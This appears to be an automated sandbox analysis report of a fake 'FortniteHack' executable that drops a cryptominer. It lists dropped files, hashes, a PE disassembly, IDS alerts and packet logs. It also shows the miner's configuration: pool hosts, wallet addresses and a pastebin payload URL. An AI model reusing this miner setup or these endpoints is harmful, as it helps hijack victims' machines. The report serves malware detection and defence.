Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="759097" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.375940767626828
Encrypted:	false
SSDEEP:	48:+WSeR4xym7jgZ9tz4RIoUl8NPZHUl7u1iMuge//ZUUyus:+LXxvIZfIfSKRHmOugms
MD5:	8110C08562DBE7F79B822D38A8F8B7B3
SHA1:	34F4516D9D8D4E9E5607311DF760F98BAA2CE1B1
SHA-256:	3738FDCB33569A6AB0320A334D2E177CB088A11D33464AB359178D1FAA55865F
SHA-512:	0508A381F0F5CA301F4AE97178C8FC956C83F86A71B90CF9365977B72A9A7DCC54397ABC846112A300B6A91D12B5C8B54E291A6DD90BA7DE3B709FB0CFAA05B1
Malicious:	false
Preview:	@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0.................Vn.F..kLsw..........System..4...............<."..Ke@...j..........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..4..................~..2K..}...0........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe

Download File

Process:	C:\Users\user\Desktop\FortniteHack.exe1.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	modified
Size (bytes):	21504
Entropy (8bit):	5.163407645311707
Encrypted:	false
SSDEEP:	384:DbjjHZQ3N5ofJHFrybCN906pXtM5PFNwN9zmuM15/ufjWrynX:DbjjHe38BgbGqBFNwvsNe
MD5:	C11A82D699A06D9B8BA4296E0C562AE4
SHA1:	E91963FE8DEF3ED151333A6A66D005237600BA30
SHA-256:	483B1D7DAC70DE82E9B22A0C1ED775CF7E10B0A3790C5AA1B9215DBCD1754302
SHA-512:	CC8644279EA2CEBF70F594F6CC48D6EBBC10D036B7DCF1008FC05565DA85CC36F7E8AF7FAA49B7C117C9A6AC94D7C007A99B53EC1DD668A7F8C28DC25B410A54
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 82%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...zX!..........."...0..H..........:f... ........@.. ....................................`..................................e..O...................................4e..8............................................ ............... ..H............text...@F... ...H.................. ..`.rsrc................J..............@..@.reloc...............R..............@..B.................f......H........6...,...........c..p............................................0............}.....(.......(.....(.....(......(......(.....~....r...po......,0.~....~....r...p.(.....~....~....r#..p.(......+..~....~....r...p.(......~....~....rC..p.(.....(.....(......(.........0..!.........(......%o.... ....`o.......+......0............ ....(..... .'...1........s......~....o........s.........r[..p.+....X......o....%............-......8...............E............!.../...:...E...P...[

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2i1fhcct.5u2.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3dx30wkz.rrh.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kilhamhh.aab.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tbk3rbsf.ylw.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\logs.uce

Download File

Process:	C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	344
Entropy (8bit):	5.688678537167479
Encrypted:	false
SSDEEP:	6:DiYgE/ovKDMcPmriYgE/ovKDMcBCrT5fhXGT2QSBa5ydXnzAiGUlQPoy68f1KAK3:uwgyXmGwgyoH55GT2Qtyc3n1KAU
MD5:	1A4E05716C2A8B7A5F34172178340305
SHA1:	2E1A747A57E99B7FA2F691568104C5431F79A849
SHA-256:	FB42753CE0F515D7E4BF6B3C86895CC14FC59BE6A1A81D429A34B88F48286173
SHA-512:	41D18BDA9117C3F0162F5ACA3C63FE139A38ED4A419619992C258CF1107BF4C2D0EC9B9CFB402D19347FE4C50CFEA0ED6FBD4602781027B725463C613E0837CA
Malicious:	false
Preview:	ETCHASH..etc.2miners.com:1010..0x7fe2496e102A4E43617eb2E95B5d1D1C3f6Db972..ETCHASH..etc.2miners.com:1010..0x7fe2496e102A4E43617eb2E95B5d1D1C3f6Db972..XMR..pool.hashvault.pro:443..ZEPHYR3c6xGj8D5oP4tzKQbPn2dNdse6aPRWxNBiwBFrg7RFN4jf1cqgj5qdR9Wdru44g2FATJHHH38oFDTH6krgKntSzLc5Csy3t..Dnepr..F(Ff4f67h((jgf..cp..https://pastebin.com/raw/YpJeSRBC..

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.573077804356806
Encrypted:	false
SSDEEP:	6144:vGPefZnQMa3tfLpbn90foomgsattlbSpd5qDpP3QoSSFF0XeIja2BatTDUskpABR:ePVAooVVDxgy1JdD8Oye
MD5:	0CCEE1FE76423ABB92EA91474E8F51B2
SHA1:	353273FA1F8175A098B78E4AA36D28EA06CFB5C6
SHA-256:	430073215E5D8A13024C698C0C29B1A63DEBBE11A8BEE3D4AC8D6C3A1FA63F21
SHA-512:	69A1707AEA233F6EA87C15C510EC9F3CAC0437C43EF7373523AEA7C44637388D9637CAA5BAF468353800C5D31C53022A612AE6E3D873837BCCD60A48A37FE16A
Malicious:	false
Preview:	regfM...M....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.@.bh...............................................................................................................................................................................................................................................................................................................................................@..V........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve.LOG1

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	3.4116295816838518
Encrypted:	false
SSDEEP:	384:CYz+F7GvYwyQnUi/xQ7kspH2jq5b8cNCspFZpYolJ:ClFigwFnl2As1X5R8sTZpYolJ
MD5:	085EBE146D80F97A18F66A10E671646A
SHA1:	27C8B607D1AE7F38FA624B10AB5F8D962D1A4740
SHA-256:	0DC3062D6ACF396D51BECD5D8DD8DF91F4AF16934C8E3A0A074DB8DD53B2F6AC
SHA-512:	703D1BB85550D731183FDF6147CC22DD891F6E3508EB55FC7717FFF1D818D5FCCFB3F417262C5BFF12ADDD822D8DD8F6606C3FB845D37E6CEFA8C9626F6733B6
Malicious:	false
Preview:	regfL...L....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.@.bh...............................................................................................................................................................................................................................................................................................................................................F..VHvLE.^......L...........R.W....bND.=..%..................0... ..........hbin.................\.Z............nk,..\.Z....................h...................................<.......&...{11517B7C-E79D-4e20-961B-75A811715ADD}..`...sk..........m...........\...l.............H.........?...................?...................?........... ... ........... ... ...................$.N..........vk..4...`...........CreatingCommand.....O.n.e.D.r.i.v.e.S.e.t.u.p...e.x.e. ./.s.i.l.e.n.t.......vk..

C:\logs.uce

Download File

Process:	C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	344
Entropy (8bit):	5.688678537167479
Encrypted:	false
SSDEEP:	6:DiYgE/ovKDMcPmriYgE/ovKDMcBCrT5fhXGT2QSBa5ydXnzAiGUlQPoy68f1KAK3:uwgyXmGwgyoH55GT2Qtyc3n1KAU
MD5:	1A4E05716C2A8B7A5F34172178340305
SHA1:	2E1A747A57E99B7FA2F691568104C5431F79A849
SHA-256:	FB42753CE0F515D7E4BF6B3C86895CC14FC59BE6A1A81D429A34B88F48286173
SHA-512:	41D18BDA9117C3F0162F5ACA3C63FE139A38ED4A419619992C258CF1107BF4C2D0EC9B9CFB402D19347FE4C50CFEA0ED6FBD4602781027B725463C613E0837CA
Malicious:	false
Preview:	ETCHASH..etc.2miners.com:1010..0x7fe2496e102A4E43617eb2E95B5d1D1C3f6Db972..ETCHASH..etc.2miners.com:1010..0x7fe2496e102A4E43617eb2E95B5d1D1C3f6Db972..XMR..pool.hashvault.pro:443..ZEPHYR3c6xGj8D5oP4tzKQbPn2dNdse6aPRWxNBiwBFrg7RFN4jf1cqgj5qdR9Wdru44g2FATJHHH38oFDTH6krgKntSzLc5Csy3t..Dnepr..F(Ff4f67h((jgf..cp..https://pastebin.com/raw/YpJeSRBC..

Static File Info

General

File type:	PE32 executable (console) Intel 80386, for MS Windows
Entropy (8bit):	7.688652334674648
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	FortniteHack.exe1.exe
File size:	1'365'504 bytes
MD5:	28ba19e1dcaeb26263becc4ee53ffe66
SHA1:	da456332601815ce52dcbb2908d1b23b3547aab6
SHA256:	e882d7327d79d9aff5d4c30c0c3b102faeabdb825fa004593518984b16d1ae4d
SHA512:	a184b1d7992cc18ca39284893896babb775107187baee15f0ecdacd449d0b0619ea82ac3b0ba849ee873d8071cc79587e485f36761c005fb2cbdd427ccf250d3
SSDEEP:	24576:QAi/c6dNtEWZ4B+UsxoxbzmXt68/9o2fjy68/9o2fj:20qNtnKB+UsxoxbzYtfoMmfoM
TLSH:	E455E07270C5D073F68199B23598E375146BF672DE2E0FC7A2B4E7789048AC117AA12F
File Content Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L......g..........................................@.......................................@.................................06..<..

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x46e682
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x67D09BB6 [Tue Mar 11 20:23:18 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	d462aa757f68629e41b3df6e6d4c6a3c

Authenticode Signature

Signature Valid:
Signature Issuer:
Signature Validation Error:
Error Number:
Not Before, Not After
Subject Chain
Version:
Thumbprint MD5:
Thumbprint SHA-1:
Thumbprint SHA-256:
Serial:

Entrypoint Preview

Instruction
call 00007F508C7D5CEAh
jmp 00007F508C7D5B59h
mov ecx, dword ptr [00496840h]
push esi
push edi
mov edi, BB40E64Eh
mov esi, FFFF0000h
cmp ecx, edi
je 00007F508C7D5CE6h
test esi, ecx
jne 00007F508C7D5D08h
call 00007F508C7D5D11h
mov ecx, eax
cmp ecx, edi
jne 00007F508C7D5CE9h
mov ecx, BB40E64Fh
jmp 00007F508C7D5CF0h
test esi, ecx
jne 00007F508C7D5CECh
or eax, 00004711h
shl eax, 10h
or ecx, eax
mov dword ptr [00496840h], ecx
not ecx
pop edi
mov dword ptr [00496880h], ecx
pop esi
ret
push ebp
mov ebp, esp
sub esp, 14h
lea eax, dword ptr [ebp-0Ch]
xorps xmm0, xmm0
push eax
movlpd qword ptr [ebp-0Ch], xmm0
call dword ptr [00493864h]
mov eax, dword ptr [ebp-08h]
xor eax, dword ptr [ebp-0Ch]
mov dword ptr [ebp-04h], eax
call dword ptr [00493824h]
xor dword ptr [ebp-04h], eax
call dword ptr [00493820h]
xor dword ptr [ebp-04h], eax
lea eax, dword ptr [ebp-14h]
push eax
call dword ptr [004938ACh]
mov eax, dword ptr [ebp-10h]
lea ecx, dword ptr [ebp-04h]
xor eax, dword ptr [ebp-14h]
xor eax, dword ptr [ebp-04h]
xor eax, ecx
leave
ret
mov eax, 00004000h
ret
push 00498490h
call dword ptr [00493884h]
ret
push 00030000h
push 00010000h
push 00000000h
call 00007F508C7DC835h
add esp, 0Ch

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x93630	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x99e00	0x4540
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x9a000	0x435c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x8fb28	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x8bf98	0xc0	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x937c0	0x154	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x89ad0	0x89c00	0bd698a1f44cc91b018d0fe5240109ab	False	0.5286942774500908	data	7.09207256696417	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8b000	0xa034	0xa200	383899a836f6650ba73e1556e24d0e62	False	0.4230806327160494	data	4.888147649186249	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x96000	0x2c5c	0x1600	233e04c81724f6e0f553a5dbb15f0a09	False	0.4073153409090909	data	4.744840434225013	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x99000	0x9	0x200	1f354d76203061bfdd5a53dae48d5435	False	0.033203125	data	0.020393135236084953	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x9a000	0x435c	0x4400	b181df1a2af7bbd01ea74e454a21e7ba	False	0.7916475183823529	data	6.714823432652306	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.bss	0x9f000	0x57800	0x57800	c25bd3e39d2a7cd6b854c6ef5dd51991	False	1.0003236607142858	OpenPGP Public Key	7.999447336857893	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss	0xf7000	0x57800	0x57800	c25bd3e39d2a7cd6b854c6ef5dd51991	False	1.0003236607142858	OpenPGP Public Key	7.999447336857893	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL

Import

KERNEL32.dll

AcquireSRWLockExclusive, CloseHandle, CompareStringW, CreateFileW, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, EnumSystemLocalesW, ExitProcess, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeConsole, FreeEnvironmentStringsW, FreeLibrary, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetFileSizeEx, GetFileType, GetLastError, GetLocaleInfoW, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, GetUserDefaultLCID, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, IsValidLocale, LCMapStringEx, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadConsoleW, ReadFile, ReleaseSRWLockExclusive, RtlUnwind, SetEndOfFile, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, SleepConditionVariableSRW, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, UnhandledExceptionFilter, WakeAllConditionVariable, WideCharToMultiByte, WriteConsoleW, WriteFile

ole32.dll

OleDraw

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-03-13T13:35:14.662194+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.12	49684	188.114.96.3	443	TCP
2025-03-13T13:35:17.777699+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.12	49688	188.114.96.3	443	TCP
2025-03-13T13:35:20.825726+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.12	49692	188.114.96.3	443	TCP
2025-03-13T13:35:23.161912+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.12	49697	188.114.96.3	443	TCP
2025-03-13T13:35:26.553501+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.12	49698	188.114.96.3	443	TCP
2025-03-13T13:35:29.850571+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.12	49699	188.114.96.3	443	TCP
2025-03-13T13:35:34.357672+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.12	49702	188.114.96.3	443	TCP
2025-03-13T13:35:41.760175+0100	2829056	ETPRO MALWARE Observed Request for xmrig.exe in - Coinminer Download	2	192.168.2.12	49705	185.215.113.51	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 13, 2025 13:35:13.111318111 CET	49684	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:13.111371040 CET	443	49684	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:13.111437082 CET	49684	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:13.116950035 CET	49684	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:13.116972923 CET	443	49684	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:14.662103891 CET	443	49684	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:14.662194014 CET	49684	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:14.700393915 CET	49684	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:14.700433016 CET	443	49684	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:14.700803041 CET	443	49684	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:14.748657942 CET	49684	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:15.154577971 CET	49684	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:15.154606104 CET	49684	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:15.154732943 CET	443	49684	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:16.125514984 CET	443	49684	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:16.125566006 CET	443	49684	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:16.125617981 CET	443	49684	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:16.125622034 CET	49684	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:16.125653028 CET	443	49684	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:16.125686884 CET	443	49684	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:16.125722885 CET	49684	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:16.125729084 CET	443	49684	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:16.125765085 CET	49684	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:16.126044989 CET	443	49684	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:16.132200003 CET	443	49684	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:16.132234097 CET	443	49684	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:16.132249117 CET	49684	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:16.132253885 CET	443	49684	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:16.132309914 CET	49684	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:16.132313967 CET	443	49684	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:16.139285088 CET	443	49684	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:16.139343977 CET	49684	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:16.142553091 CET	49684	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:16.142570019 CET	443	49684	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:16.142616034 CET	49684	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:16.142623901 CET	443	49684	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:16.390356064 CET	49688	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:16.390397072 CET	443	49688	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:16.390635014 CET	49688	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:16.391007900 CET	49688	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:16.391027927 CET	443	49688	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:17.777590990 CET	443	49688	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:17.777698994 CET	49688	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:17.792615891 CET	49688	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:17.792632103 CET	443	49688	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:17.792881012 CET	443	49688	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:17.796346903 CET	49688	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:17.796818972 CET	49688	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:17.796854019 CET	443	49688	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:18.634843111 CET	443	49688	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:18.634943962 CET	443	49688	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:18.635004044 CET	49688	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:18.635176897 CET	49688	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:18.635198116 CET	443	49688	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:18.741277933 CET	49692	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:18.741336107 CET	443	49692	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:18.741421938 CET	49692	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:18.741770983 CET	49692	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:18.741791964 CET	443	49692	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:20.825645924 CET	443	49692	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:20.825726032 CET	49692	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:20.827291965 CET	49692	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:20.827303886 CET	443	49692	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:20.827560902 CET	443	49692	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:20.843039036 CET	49692	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:20.843184948 CET	49692	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:20.843219995 CET	443	49692	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:20.843276978 CET	49692	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:20.843287945 CET	443	49692	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:21.644984961 CET	443	49692	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:21.645386934 CET	49692	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:21.894207954 CET	49697	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:21.894268036 CET	443	49697	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:21.894345999 CET	49697	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:21.894709110 CET	49697	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:21.894723892 CET	443	49697	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:23.161820889 CET	443	49697	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:23.161911964 CET	49697	443	192.168.2.12	188.114.96.3
